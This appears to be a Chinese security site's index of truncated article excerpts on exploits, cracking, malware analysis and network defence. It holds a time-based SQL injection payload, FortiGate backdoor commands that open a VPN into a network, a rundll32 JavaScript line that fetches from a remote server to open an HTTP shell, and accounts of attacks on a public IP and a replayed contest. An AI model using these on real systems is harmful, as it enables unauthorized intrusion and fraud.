一：吾爱破解论坛【破解专用虚拟机】的由来当你破解软件导致被格盘的时候，当你破解软件导致全盘感染病毒的时候，当你在破解的时候还在东找一个工具西找一个工具的时候，当你破解的时候把系统又玩挂的时候，你有没有想过怎么办？很多同学还不知道什么是虚拟机，也有很多同学已经用上了，吾爱为了解决广大初级爱好者的学习需求，特此发布吾爱破解论坛破解专用虚拟机，在这个虚拟机系 统中进行破解，出现任何格盘或者病毒都不会影响你真实系统环境，虚拟系统可以随时备份快照或者还原快照，即使虚拟系统被格盘了，只要花一分钟还原快照就能 恢复！二：吾爱破解论坛【破解专用虚拟机】特点1、集合了目前逆向破解中经常用到的工具，并且已安装好吾爱破解论坛小生我怕怕最新工具包！2、修改虚拟机文件，可以躲过目前主流壳虚拟机检测，比如Safengine、VMProtect、ThemIDA等等！3、已保存一份原始快照，虚拟系统出现问题可随时还原。4、添加了诸多方便逆向的快捷操作 如：鼠标右键 发送到 OllyDbg 等等三：吾爱破解论坛【破解专用虚拟机】下载和安装过程1、下载地址a、百度云盘：http://pan.baidu.com/s/1hqKQqC8密码: ly6db、爱盘下载：http://down.52pojie.cn/Tools/Other/2、安装过程3、打开虚拟机并设置好共享文件夹(方便复制文件去虚拟机)4、还原虚拟机快照四： ...继续阅读 (14)

0x00 介绍Java RMI服务是远程方法调用（Remote Method Invocation）。它是一种机制，能够让在某个java虚拟机上的对象调用另一个Java虚拟机的对象的方法。在Java Web中，很多地方都会用到RMI来相互调用。比如很多大型组织都会在后台部署一些Java应用，用于对外网站发布更新的静态页面，而这种发布命令的下达使用的就是这种RMI形式。值得注意的是，RMI传输过程必然会使用序列化和反序列化，如果RMI服务端端口对外开发，并且服务端使用了像Apache Commons Collections这种库，那么会导致远程命令执行。首先来看利用。0x01 漏洞利用搜索shodan：https://www.shodan.io/search?query=port%3A%221099%22+country%3A%22CN%22可以看到还是有很多案例的，这里提取一个案例来演示：场景：182.92.214.221服务器开放了1099端口（RMI服务的默认开放端口），且暴露在公网中，并且恰好使用了Apache Commons Collections的缺陷版本，我们需要在这台服务器上执行命令。工具：（1）ysoserial-0.0.3-all.jar下载地址https://github.com/frohoff/ysoserial（2）java环境执行命令时，为了验证是否真正成 ...继续阅读 (432)

通过测试得出以下猜想：1、正版的burpsuite应该没有经过混淆，从BurpLoader.jar和burpsuite_pro_v1.5.18.jar的混淆方式来看是用了同一款混淆工具，所以如果有正版的话，大概可以逆向出授权算法，例如larry_lau大神。2、BurpLoader.jar最新版添加了反调试代码，并对混淆过的burpsuite_pro_vx.x.x.jar进行了md5值校验；3、混淆过的burpsuite_pro_vx.x.x.jar中添加了对BurpLoader.jar的校验，防止有人对BurpLoader.jar进行patch。第三点可以这样简单验证，将BurpLoader.class文件中的字符串larry_lau@163.com随便改掉一个字符再放回BurpLoader.jar中，该程序就不能正常运行了。这就是我百思不得其解的地方，因为我逆向出了loader的源代码，编译却执行不了，问题就出在这里。larry_lau大神浪费我不少时间啊:)下面贴几张图：上图需要先如下配置：如果要看字节码文件可以这样操作：字节码文件也可以调试，需要用到eclipse的Bytecode Visualizer插件,以下是调试中的几张截图：1.5.18版本的BurpLoader.jar经过了混淆，但主要参数可以用python解密得到。解密算法类似:def decrypt(s): ...继续阅读 (315)

0x00 简介Sofacy组织，也被称为APT28或者Sednit，是一个相当知名的网络攻击间谍组织，据信跟俄罗斯有关。他们的攻击目标遍布全世界，主要针对政府、防御组织和多个东欧国家政府。已经有很多关于他们活动的报告，以至于已经有维基百科的词条。从这些报告里，我们发现该组织有丰富的工具和策略，包括利用0day漏洞攻击通用应用程序，例如JAVA或者Microsoft Office；大量使用鱼叉式网络钓鱼；利用合法网站进行水坑式攻击并且目标包括各类操作系统–Windows、OSX、Linux、iOS。Linux下的恶意软件Fysbis是Sofacy很喜欢使用的一个工具，虽然这个工具不是特别的精巧复杂。但由于Linux安全总体上是一个不是很成熟的领域，特别是恶意软件方面。所以，这个工具帮助了Sofacy组织进行成功攻击是完全有可能的。0x01 恶意软件评估Fysbis是一个模块化的Linux木马/后门，将插件和控制模块作为不同的类来实现。一些分析把这个恶意软件归类到Sednit组织命名名称里。这个恶意软件包括32位和64位的ELF文件。此外，Fysbis在有或者没有root权限的情况下都可以把自己植入目标系统。当需要选择安装的账户时，这增加了攻击的选择。对3个样本的总结信息如下：MD5 364ff454dcf00420cff13a57bcb78467 SHA-256 8bca ...继续阅读 (28)

通过任意文件下载找到了mysql的备份，表类型是独享式innodb，由一个frm文件和一个ibd文件组成。本以为直接复制到本地的mysql数据目录中即可恢复数据，但在查询时却发现并不如所愿：mysql> select * from admin; ERROR 1146 (42S02): Table 'test.admin' doesn't exist mysql> show tables; +----------------+ | Tables_in_test | +----------------+ | admin | +----------------+ 1 row in set (0.00 sec)查找资料得知，innodb的表信息存放于datadir下面的ib_logfile*与ibdata1文件内。而由于事务的存在，这些文件在复制后并不能还原。由于独享式innodb的数据实际上都保存在ibd文件内，于是尝试直接从ibd文件内恢复数据。最后在stackexchange(http://dba.stackexchange.com/questions/57120/recover-mysql-database-from-data-folder-without-ibdata1-from-ibd-files)找到了老外的一个思路：使用mysqlfrm工具将f ...继续阅读 (51)

0x01起因：公司年会活动，[微信摇一摇]，第一者给予xxx奖励。0x02流程:微信公众号关注，回复摇一摇文字返回连接地址，点击连接地址进入活动，后台开启活动后玩家开始摇。0x03分析：1.微信摇一摇活动是第三方开发的应用，微信公众后台进行绑定。（已知是上海某家平台）2.暂不知道原理，要通过抓包进行分析。0x04过程：1.手机代理：简单描述下过程。手机连接wifi代理到电脑，电脑要和wifi在同网络。 也可以电脑开热点，然后监听热点截取封包。2.本地抓包工具：fiddler我喜欢用它。端口监听要和手机代理填写的一致3.准备完成后开始关注公众号，发送摇一摇，返回连接地址。抓取到第三方平台连接地址。过程大概如下，先授权登录。get参数。  token是唯一的，是公众账号唯一标识通过摇一摇发现活动是基于post请求来达到次数的记录看图。 （摇取一次就会记录保存一次，当摇取到指定次数，活动结束，评选出第一名）其中openid是唯一的，也是用户标识。经过与其他人的对比发现，变量只有这个。更加确定这就是我唯一的标识。下面的totalscore参数就是总次数。通过fiddler工具的重放攻击，达到了想要的效果。近一步测试确定了效果，也分析了该活动的玩法原理(一天280元)。唯一id和唯一标识都不变，每次只需要重放post的包就可以。为此我专门截取了这次的封包(我和朋友的)在活动的时候进行重放攻击 ...继续阅读 (34)

【0x01】入口：nmap 扫描c段发现x.x.x.2开放不少端口https（443）访问发现是个ssl-vpn登录口按照经验，一般这种系统往往会存在测试帐号，比如test、Guest等等。手工试一下：test::****，然后就进去了。【0x02】发现：进去后，对各个功能进行了熟悉和测试，发现了一个erp软件。打开后需要登录，测试了几个常用测试口令，进去了。【0x03】新发现：这个ssl-vpn同时提供了远程使用word、excel、ppt等等功能，想到利用宏执行命令（最后反思这种方法是不行的），还没来的及尝试，就有新的发现，那个erp软件有个推荐功能呢，点击发现调用了ie来打开链接！看到ie就不由的想起了老外的那个渗透测试报告（https://www.offensive-security.c … ple-report-2013.pdf），里面有个Citrix沙盒绕过，和我现在遇到的这个情景非常相似!照猫画虎，一番测试下来，发现不行。不能利用ie下载木马并执行，管理员做了策略，不能使用ie从非白名单域名下载东西，然后我尝试编辑internet选项，添加当前域名到白名单，发现没有权限！【0x04】尝试其他的方法：利用ie的另存为，打开资源管理器，然后编辑任意一个txt文本，从而实现调用notepad。【0x05】新问题：不能修改文件后缀名。在老外的那个沙盒绕过中，他们直 ...继续阅读 (18)

#0x1 内容简介本片文章是利用karma攻击搭建一个wifi绵羊墙，将自动链接上来的用户的主机名和被动广播出去的ssid的名称展示在屏幕上，我们先了解一下karma攻击的原理Karma是一种通过伪造虚假响应包(Probe Response)来回应STA(Wireless station，手机、平板等客户端等)探测(Probe Request)的攻击方式，让客户端误认为范围内存在曾经连接过的WiFi热点，从而骗取客户端的连接。简单的理解就是，你的设备会保存你链接过的wifi的记录，例如你链接过 sectoolkit-wifi 这个ssid，当你打开wifi的时候，你的设备会自动广播附近有没有 sectoolkit-wifi ，一般情况下只有叫这个ssid的路由器才应答，karma就是将所有寻味是否是xxxwifi的请求全部应答，告诉用户我就是xxxwifi，然后用户 就会自动链接上去。#0x2 准备过程我们需要以下的东西：1. 一块无线网卡，8187最佳2. 一个Linux系统，（如：kali）需要用到的软件1. isc-dhcp-server2. aircrack-ng3. dnschef4. ethtool在kali下dnschef与aircrack-ng是自带的，其他的都可以通过apt-get进行安装apt-get install ethtool isc-dhcp-serve ...继续阅读 (312)

原文地址：https://adsecurity.org/?page_id=1821原文作者：Sean Metcalf译者注：由于原文中，作者（Sean Metcalf）已经明确的指出“未经本文作者明确的书面同意，请勿复制包含在此页面的全部或部分内容。”，因此为了分享此佳作，译者与作者（Sean Metcalf）在推上取得了联系，沟通之后，作者允许我将此文完整翻译并分享给其他人。在此也感谢 Sean Metcalf 大牛将有关 Mimikatz 的全部内容做了系统的整理并分享出来。以下是原文作者（Sean Metcalf）回复的截图,以作授权说明：0x00 简介Mimikatz 作为当下内网渗透神器之一，看起来似乎很少有人真正关注它的全部功能（Sean Metcalf 在原文开头也表示了这样的疑惑），在一些诸如“十大黑客工具”的文章中也看不到 Mimikatz 的影子。 Sean Metcalf 大牛将有关 Mimikatz 的相关技术做了系统的整理，遂做粗糙翻译并作分享。译文难免有误，望各位看官及时指正。此文是译文的第二部分，主要阐述了使用 Mimikatz 创建三大票证（黄金票证，白银票证，信任票证）的命令用法，以及 哈希传递（PTH），票证传递（PTT），密钥传递（PTK），缓存传递（PTC）的利用，在第三部分中会包含大量常用或不常用的 Mimikatz 命令的具体用法。0x0 ...继续阅读 (31)

原文地址：https://adsecurity.org/?page_id=1821原文作者：Sean Metcalf译者注：由于原文中，作者（Sean Metcalf）已经明确的指出“未经本文作者明确的书面同意，请勿复制包含在此页面的全部或部分内容。”，因此为了分享此佳作，译者与作者（Sean Metcalf）在推上取得了联系，沟通之后，作者允许我将此文完整翻译并分享给其他人。在此也感谢 Sean Metcalf 大牛将有关 Mimikatz 的全部内容做了系统的整理并分享出来。以下是原文作者（Sean Metcalf）回复的截图,以作授权说明：Mimikatz 作为当下内网渗透神器之一，看起来似乎很少有人真正关注它的全部功能（Sean Metcalf 在原文开头也表示了这样的疑惑），在一些诸如“十大黑客工具”的文章中也看不到 Mimikatz 的影子。 Sean Metcalf 大牛将有关 Mimikatz 的相关技术做了系统的整理，遂做粗糙翻译并作分享。译文难免有误，望各位看官及时指正。此文是译文的第一部分，主要阐述了 Mimikatz 的基本信息和检测 Mimikatz 使用的方法，在第二部分中会包含大量常用或不常用的 Mimikatz 命令的具体用法。0x00 简介看起来 Red（攻） & Blue（防） Team 里的大多数人并不熟悉 Mimikatz 的大部分功 ...继续阅读 (35)

围棋AI下赢了欧洲冠军。这件事情本身还没那么可怕，毕竟棋界人士一致认为这几盘棋的人类发挥得并不好。但是毫无疑问，AI迟早会碾压人类，区别只是时间长短而已，柯洁也这么认为。那怎么办？是否我们就要安心承认机器的霸主地位，甘做二流棋手了呢？当然这样不见得就是坏事儿。人类画师的仿真能力早就输给了摄影，但绘画也没有因此失去意义；国际象棋的顶尖AI已经连续十年没输给人类了，但人类间的国际赛事依然如火如荼。无论把围棋看成竞技还是艺术，战胜自己都是最重要的。世界第一不过是名分而已，无论是人还是机器。但是如果有一天我们必须决出胜负，如果反叛的AI要求以围棋裁断地球的归属，如果我们必须向外星人证明人类智慧，那是不是就束手无策了呢？人还会偶尔失误，AI难道不是滴水不漏的吗？也不一定。如果真的有那么一天，我们可能还会有一根救命稻草：“对抗样本”。神经网络，在意想不到的地方绊倒2014年底，三位人工智能研究者在arxiv上贴出了一篇论文预印本。论文标题很有趣：《深度神经网络很好骗》。深度神经网络是目前最热门的人工智能路线之一，谷歌的AlphaGo围棋软件就以它为核心，而且相当多的人认为这是未来最有前途的高级人工智能。但 神经网络的功能当然不止下围棋，它们还在许多其他领域实现了卓越成就，比如“视觉分类”任务——神经网络可以相当准确地判断出图片是猫还是企鹅。相当准确，但并不完美。研究者发现，人为设计的图像很容易 ...继续阅读 (11)

数据隐藏已经渗透到了生活中的方方面面，之前一直对数据隐藏很有兴趣，但是乌云上关于数据隐藏的文章偏少，看了隐写术总结之后，我又去找了一些关于数据隐藏的资料，这里来与大家分享和总结下其他一些比较常见的隐藏手段，如果有写错的地方请直接指出，谢谢。0x01 vmdk隐写vmdk文件大家应该都比较熟悉了，它本质上是物理硬盘的虚拟版，所以也会存在跟物理硬盘的分区和扇区中类似的填充区域，我们可以利用这些填充区域 来把我们需要隐藏的数据隐藏到里面去，这样可以避免隐藏的文件增加了vmdk文件的大小(如直接附加到文件后端)，也可以避免由于vmdk文件大小的改变 所带来的可能导致的虚拟机错误。而且vmdk文件一般比较大，适合用于隐藏大文件。这里采用Dsfok-tools来对数据进行隐藏，通常这个工具是用来编辑vmdk文件中的描述符。从这里可以下载到该软件。套件里包含了dsfi工具可以对vmdk文件进行嵌入。 我们首先来看下需要隐藏的文件和它的大小按照下载页面的提示输入命令嵌入完成后该vmdk文件依然是可以继续使用，而且虚拟机并不会报错。再来对嵌入的文件进行提取。这里要提醒的是，如果长期运行该虚拟机，隐藏在里面的数据是很有可能被覆盖掉，但是如果仅仅是作为数据隐藏的载体，除了需要提取的那个人外谁又在意这个问题呢，或许别人还巴不得这样。0x02 交换数据流Windows NTFS文件系统的交换数据流(ADS) ...继续阅读 (18)

分析某商城漏洞，在漏洞验证时采用了两种iOS上的hack工具：cycript和reveal，各有风情，均能攻城拔寨，实乃我辈日常居家、杀人越货之利刃，现与诸君共享之。0x00 漏洞缘起该商城的iOS版app为用户提供了找回密码的功能，用户需通过三个步骤找回密码：输入一个本地的图形辨识验证码（多余？）提供用户手机号，输入一个短信验证码输入新的密码、确认密码，然后Bingo要找漏洞，先抓包看看，先易后难，实在不行再做逆向分析。burp架起先，开代理、关闭intercept、ssl协议算法全勾上（免得碰上奇葩ssl协商参数，以前遭过冤枉）。iPhone上在wifi选项中配置代理，指向burp。然后开app，burp报错。难道客户端对证书进行了pin？冷笑三声，开启我的ssl kill switch。再开程序，登录，进商城，一切顺利。ok，现在进入正题，找漏洞。进入找回密码功能，按步骤进行提交，重设了密码，然后到burp中查看抓 到的数据包，下面是重置密码第三步发出的post数据包。仔细分析这个数据包，发现除了一个签名，其它跟第二步获得的手机短信验证码没有一毛钱的关系，难道这个“你妈是你妈”问题的验证是在客户端做的？那 我们是不是改改电话号码就能重置任意用户密码了？在burp中改包试了试，不行的，服务器返回错误。看来在Sign中有文章，看来需要从客户端想办法了。丢到ida中跑，找到如下关键 ...继续阅读 (40)

大约两个月内，加拿大重要基础设施遭遇了25次国家支持的黑客攻击。受到攻击的基础设施包括发电厂、输电网、航空软件等一系列政府系统，疑似是外国政府（包括敌对的和友好的）派遣的黑客所为。换句话说，APT攻击就是黑客偷偷找到能访问系统的后门，然后进行很长一段时间的潜伏，期间黑客们可以尽情的搜集系统上的数据。据加拿大网络事件应急响应中心（CCIRC）发布的报告称，有25起事件中主机受到APT相关恶意软件影响。所有的威胁全部来源于“信息和通信技术部门”，且它连接着加拿大主要公共基础设施。现在的重要基础设施正在逐步变得智能化和网络化，它们支撑着众多公共系统，比如输电网、核电站、水过滤站和金融机构。如果黑客成功利用了这些基础设施，将会导致互联网界的“珍珠港事件”。加拿大国家安全情报局（CSIS）也承认，这些黑客所造成的威胁是真实的，可能会对供水、能源、公共事业、制造业、互联网通信技术、甚至是学校和医院造成很大的影响。加拿大闭口不谈黑客攻击事件当被问及任何关于加拿大重要基础设施被敌对国家黑客攻击的问题时，加拿大公共安全部闭口不谈。加拿大公共安全部发言人MylèneCroteau说道：“尽管我们不评论任何关于加拿大重要基础设施是否遭受特定或者潜在的黑客攻击，但是我们可以肯定的是CCIRC始终聚焦在保护政府重要系统上，包括重要基础设施。”很明显的是，这些国家针对的不仅仅是加拿大重要基础设施，还有由软件、 ...继续阅读 (20)

平时在渗透测试中大家经常会用到内网渗透,然而内网渗透中很重要的一个步骤就是端口转发。常见的端口转发lcx.exenc.exeUsing php/jsp/aspx Scriptiptables端口转发nginx端口转发等等……其中lcx.exe、nc.exe以及使用脚本转发,都有可能被防护/杀毒软件拦截,而后者则略微有点麻烦(不会告诉你是因为我真懒!)我是一个非常喜欢渗透测试的人,并且颜值比较高(啊,打我干啥!)偶尔也会用到内网渗透,进行端口转发什么的,但时长会遇到XX狗,XX卫士,上传lcx.exe或者nc.exe就会被杀掉…用后面几种方式又感觉好像很费事的样子..前言前几天在工作中遇到了某客户的服务器被利用端口转发来做SEO分析的文章可以看这里：免杀世界杀软：神奇的端口转发黑帽SEO手法文章中详细的讲了一下端口转发的实现原理,以及是如何免杀世界杀软的。但其实这个工具也一样可以用在渗透中。NetSH (Network Shell) 是windows系统本身提供的功能强大的网络配置命令行工具。故我们可以使用netsh进行内网端口转发。使用方法新增端口转发netsh interface portproxy add v4tov4 – 添加通过 IPv4 的 IPv4 和代理连接到的侦听项目。netsh interface portproxy ...继续阅读 (15)

目录一，背景概述二，web via app审计三，将来的工作一，背景概述1.1 第三方应用综述现在的互联网厂商往往希望将自己的业务迁移到移动端，方便客户使用，这些应用一般被称作第三方app，他们的特点是：“多网络通信，少本地逻辑”，用户在界面点击，使app向server服务器发送特定的数据包，通过这样的一种过程的重复，实现第三方app的功能。1.1.1应用分类下面我根据暑假的观察，将app分为这样三类：信息提供类应用这种app一般是传统web行业的扩展，例如网易新闻客户端，大智慧股票手机端，app的作用是将基于web平台的服务复制（延伸）到手机上，便于 客户使用。这种app的特点是：输入得少，点击得多，与使用者关联小，不需要注册，也不需要个人信息往往就能使用。其背后的server架构是这样的。实例： 墨迹天气，网易新闻，大智慧手机客户端等移动金融类应用这类app的主要作用是代替网页端进行商品购买，产品的选购。由于这类app涉及金融，所以需要用户输入极其详细的个人信息（手机号最低要求）。 此类app的架构往往是独立的api服务器为app客户端提供数据返回。 实例：饿了么，中国平安手机端，美团外卖等社交活动类应用这类app主要供客户做社交用途，比如社区交友，提供跳蚤平台等。从用户角度来讲，这类app的特点是需要大量的个人信息（生日，名字，身份证，手机号等）以完成注册。从server端角 ...继续阅读 (21)

说明：1.本文提到的浏览器均是指Chrome。2.“script标签“指的都是普通的不带其他属性的外联javascript。3.web性能优化的手段并不是非黑即白的，有些手段过头了反而降低性能，所以在讨论条件和结论的时候，虽然很多条件本身会带来其他细微的负面或正面影响，为了不使论述失去重点，不会扩展太开。一、从一个面试题说起面试前端的时候我喜欢问一些看上去是常识的问题。比如：为什么大家普遍把<script src=""></script>这样的代码放在body最底部？（为了沟通效率，我会提前和对方约定所有的讨论都以chrome为例）应聘者一般会回答：因为浏览器生成Dom树的时候是一行一行读HTML代码的，script标签放在最后面就不会影响前面的页面的渲染。我很鸡贼地接着问：既然Dom树完全生成好后页面才能渲染出来，浏览器又必须读完全部HTML才能生成完整的Dom树，script标签不放在body底部是不是也一样？留一段空白让你先想一想这其实是个开放性的问题，里面涉及的概念的界定本身就很重要。“页面渲染出来了” 指的是什么？严格来说，我的最后一问是有歧义的：我们需要统一一下什么叫我们经常挂在嘴边的“页面渲染出来了” —— 指的是是 “首屏显示出来了” 还是 “页面完整地加载好了”（后面统称StepC） ？如果指的是首屏显示出来了，那么问题又来了： ...继续阅读 (19)

0x00 简介权限滥用漏洞一般归类于逻辑问题，是指服务端功能开放过多或权限限制不严格，导致攻击者可以通过直接或间接调用的方式达到攻击效果。随着物联网时代的到来，这种漏洞已经数见不鲜，各种漏洞组合利用也是千奇百怪、五花八门，这里总结漏洞是为了更好地应对和预防，如有不妥之处还请业内人士多多指教。0x01 背景2014年4月，在比特币飞涨的时代某网站曾经曝光过黑客利用监控摄像头DVR分布式挖矿的案例。无独有偶，之前国内某安全公司在开放给外部使用的扫描器平台上也曾出现了类似问题，由于功能限制不严格，导致外部使用者可以利用该扫描器探测内网。此外，某黑客也曾经在某第三方平台曝光过国内android测试平台一处漏洞，可利用该漏洞从测试平台网站直接访问该公司内部系统。0x02 案例利用权限滥用漏洞有时可以让服务器发起特定的请求（类似SSRF攻击），有时还可以使用某些特殊的功能，例如：访问摄像头、利用麦克风录音、编写并植入木马、反弹shell等等。目前国内外已经有很多手机真机测试平台，例如：Testin云测、中国移动终端池、Testdroid、TestObject、TestCloud、uTest、UserTesting、WeTest等。笔者随机抽取了一个android真机测试平台进行测试。首先，登录以后可以挑选一款机型，作为测试目标。然后进入机器调试界面，我们可以通过web端控制android手机并 ...继续阅读 (25)

在本系列的第一篇文章中，我们介绍了我们客服系统遇到DDoS攻击的情况，以及我们为什么决定采用自建CDN的方式来解决这个问题的原因。之后，我们介绍了自建CDN的具体建设规划，主要从以下几个方面进行考量：硬件成本、带宽成本、架构设计、实际部署。本文是《自建CDN防御DDoS》系列的第三篇，介绍CDN架构的后续改进。后续改进主要包括三个方面：DNS智能解析+轮询+存活监测，集中式日志分析+攻击防御，以及多节点CDN的快速部署+图形化管理。1、DNS智能解析+轮询+存活监测A. 部署智能DNS就近匹配CDN节点我们自建CDN的另外一个目的是做访问路径优化，因为这些加速节点是我们精心挑选之后部署的，无论是带宽质量、机房环境、安全风险等指标均能满足可靠可控的需求。因此当部署完多个CDN节点后，为使这些节点协同运作，同时优化用户的访问路径，我们可以通过配置Bind的View视图把访客IP指定到相应的CDN节点，使得访客能够根据自己所在的区域和线路类型，就近从CDN节点上获取页面内容，从而优化访客的路由。B. DNS自动轮询+故障监测我们可以利用DNS轮询来为网站进行分流负载。如果条件充裕，可以在各个大区内部署冗余的CDN节点，这样既能缓解某个区域内单一节点的负载，同时能为这个节点作互备，当这个区内的CDN节点因故障失效之后，调度机制能在最快时间内将故障节点的流量牵引至当前可用节点，实现动态的剔除 ...继续阅读 (20)

在本系列的第一篇文章中，我们介绍了我们客服系统遇到DDoS攻击的情况，以及我们为什么决定采用自建CDN的方式来解决这个问题的原因。下面，我们将介绍自建CDN的具体建设规划，主要从以下几个方面进行考量：硬件成本、带宽成本、架构设计、实际部署。硬件成本在硬件上，我们选型的需求是在1U的基础上具有强劲的性能，同时性价比要高。我们选择了（强氧）双子星服务器，其硬件规格为：1U机身+支持双路至强CPU+最大支持48G内存+双千兆网口x2+H3C S1208八口千兆，提供三年质保服务，总价约1.5万。带宽成本单线机房的机房和带宽资源，由于不需要经过第三方拉线撮合，直接从运营代理商购买，因此选择余地大，性价比高。以租用电信、联通单线资源为例，每条线独享100M带宽，提供8个IP，有些机房自带硬防，能够防御5G-10G流量。平均费用，每个节点带宽成本基本在1.6~2.5万/年。架构设计CDN架构上要充分体现出抗攻击能力和灵活应变的原则。因此，我们将CDN节点分解成反向代理+缓存加速+攻击防御这三个不同层次的功能结构。反向代理功能（作用：路由加速，隐藏主节点，负载均衡）缓存加速功能（作用：静态推送，节省后端主节点带宽）攻击防御功能（作用：快速解析，匹配过滤恶意攻击）开源世界里能够担当反向代理及缓存的软件不少，而且各有优劣。作为架构师，要考虑如何选型，我们从性能、功能、配置上来进行比较筛选。软件名称性 ...继续阅读 (42)

前言在本文中，DDoS的案例与应对经验均来自于某市场占有率很高的客服系统所遇到的实际场景，分别从成本、效率和具体架构设计（选型、配置、优化等）角度来分析通过自建CDN来应对不同类型的DDoS攻击。背景介绍客服系统的主要业务是提供基于网页的实时动态的文字聊天，主要应用在各类网络商品销售、网站在线客服等领域，总用户数58万，同时在线活跃的用户约12万/天。这些应用领域通常行业之间的竞争比较激烈，其中包括在线下无法名正言顺的灰色+暴利产业，导致竞争对手之间经常发动DDoS恶意攻击。但营销网站往往是单面加速，加上推广时效性很强，很难被彻底打击，于是一些自作聪明的黑客通过攻击网站的在线客服系统，导致网站无法跟访客沟通，不能交易，从而达到恶意攻击的目的。因此客服系统这个原本有助于网站营销的工具反而成了被攻击的主要对象，虽然伤得委屈，但也不得不面对挑战。我们遭遇的DDoS攻击类型包括：延缓性的CC攻击和致命的大流量攻击。下面将对两种攻击方式的攻击特点、防御思路和我们用过的一些防御方案进行简单的介绍。延缓性的CC攻击攻击特点攻击者借助网络上提供的大量代理服务器IP，利用攻击软件，生成指向受害主机的合法请求。这类攻击对攻击者来说成本低，而且网上现成的软件多，攻击的风格相对比较”温柔谨慎”，其目的是通过逐渐增多的垃圾请求，消耗服务器的正常应用开销如CPU,内存,网卡压力，甚至是网络拥堵，然后请求无响应 ...继续阅读 (16)

在数据分析领域，最热门的莫过于Python和R语言，此前有一篇文章《别老扯什么Hadoop了，你的数据根本不够大》指出：只有在超过5TB数据量的规模下，Hadoop才是一个合理的技术选择。这次拿到近亿条日志数据，千万级数据已经是关系型数据库的查询分析瓶颈，之前使用过Hadoop对大量文本进行分类，这次决定采用Python来处理数据：硬件环境CPU：3.5 GHz Intel Core i7内存：32 GB HDDR 3 1600 MHz硬盘：3 TB Fusion Drive数据分析工具Python：2.7.6Pandas：0.15.0IPython notebook：2.0.0源数据如下表所示：TableSizeDescServiceLogs98,706,832 rows x 14 columns8.77 GB交易日志数据，每个交易会话可以有多条交易ServiceCodes286 rows × 8 columns20 KB交易分类的字典表数据读取启动IPython notebook，加载pylab环境：ipython notebook --pylab=inlinePandas提供了IO工具可以将大文件分块读取，测试了一下性能，完整加载9800万条数据也只需要263秒左右，还是相当不错了。import pandas as pd reader = pd.read_csv('data/ ...继续阅读 (64)

1、$_SERVER[‘PHP_SELF’]和$_SERVER[‘QUERY_STRING’]，而$_SERVER并没有转义，造成了注入。例如：/easy/index.php/aaa',(select/**/if((select/**/ord(substr(user(),1,1)))=114,sleep(3),0)),1)#2、update更新时没有重构更新序列，导致更新其他关键字段（金钱、权限）例如：id=1&data=1991-03-16&money=10000000http://www.wooyun.org/bugs/wooyun-2014-0695073、在 php中 如果使用了一个未定义的常量，PHP 假定想要的是该常量本身的名字，如同用字符串调用它一样（CONSTANT 对应 “CONSTANT”）。此时将发出一个 E_NOTICE 级的错误（参考http://php.net/manual/zh/language.constants.syntax.php）例如：未定义常量if(IN_ADMIN != TRUE) 等式不成立，非0、null都为truehttp://www.wooyun.org/bugs/wooyun-2014-0695034、PHP中自编写对标签的过滤或关键字过滤，应放在strip_tags等去除函数之后，否则引起过滤绕过。例如：func ...继续阅读 (43)

昨天FortiGate爆了一个SSH Backdoor ，具体内容可以看这（http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-up-to-5-0-7.html）那我们如何利用了？如何利用这个SSH 后门进入到内网了？好了这就是这篇文章要讲的东西。这个后门获取到的是防火墙的root权限，就是所有防火墙的操作我们都可以做，这里我们利用防火墙的vpn服务来进入到内网中 ，从而进行进一步渗透。0X00 先看下用户组show user group0x01开启vpnconfig vpn pptp set status enable set eip 192.168.200.100 set sip 192.168.200.1 set usrgrp Guest-group end config user local edit "guest" set type password set passwd 123456 next end config user group edit "Guest-group" set profile "unfiltered" set member "guest" next end config firewall policy edit 9 set srcintf "wan1" se ...继续阅读 (30)

0x00 前言Casey Smith最近在Twitter分享了他的研究成果，执行一段JavaScript代码即可反弹一个Http Shell，很是奇妙，所以就对这个技术做了进一步研究。0x01 简介从截图我们可以看到该技术的使用方法，在cmd下利用rundll32.exe加载JavaScript代码，代码运行后会反弹一个Http Shell，而特别的地方在于当运行完cmd命令后，后台会一直存在进程rundll32.exe用来同Server持续连接，整个过程不需要写入文件， 隐蔽性大大提高。0x02 测试环境Server：OS：Win7 x64 IP：192.168.174.131Client：OS：Win7 x86 IP：192.168.174.130下载链接：https://gist.github.com/subTee/f1603fa5c15d5f8825c00x03 实际测试1、Server启动服务，监听端口需要将下载脚本中的IP修改为当前主机IP管理员运行2、Client加载JavaScript指令rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","h ...继续阅读 (36)

介绍▼恶意代码任何以某种方式对用户、计算机或网络造成破坏的软件或代码，都可以被认为是恶意代码。▼分类感染型病毒Virus蠕虫Worm木马Trojan黑客工具HackTool间谍软件Spyware风险软件Riskware垃圾文件Junk file测试文件Test file反病毒引擎扫描针对可疑文件进行扫描服务，主要通过检测样本程序关键行为、进程行为、文件行为、网络行为、注册表行为等等，判别文件行为是否为恶意代码程序。▼行为分析名称网站VirusTotalvirustotal.comVirscanvirscan.org火眼fireeye.ijinshan.comJottvirusscan.jotti.org环境搭建在开始分析恶意代码过程中难免需要动态分析， 你不知道你所分析的恶意代码程序会给你带来怎样的惊喜？所以我们需要建立一个安全环境，这里主要是通过“vmware 虚拟机”创建一个分析恶意代码的虚拟环境。而恶意代码程序有时会依靠互联网连接，来进行自身更像、获取命令、接受控制以及运行其他功能。并且有的恶意代码会检测自身是否正在虚拟机中运行，并表现出不同行为来阻扰分析。这里暂时不考虑这些较为复杂的情况，仅仅介绍一下简单的分析恶意代码的虚拟环境搭建。▼虚拟机创建软件下载http://dwz.cn/2o4vCU教程链接http://dwz.cn/2o1i5n▼硬件设置虚拟机设备中”USB 控 ...继续阅读 (25)

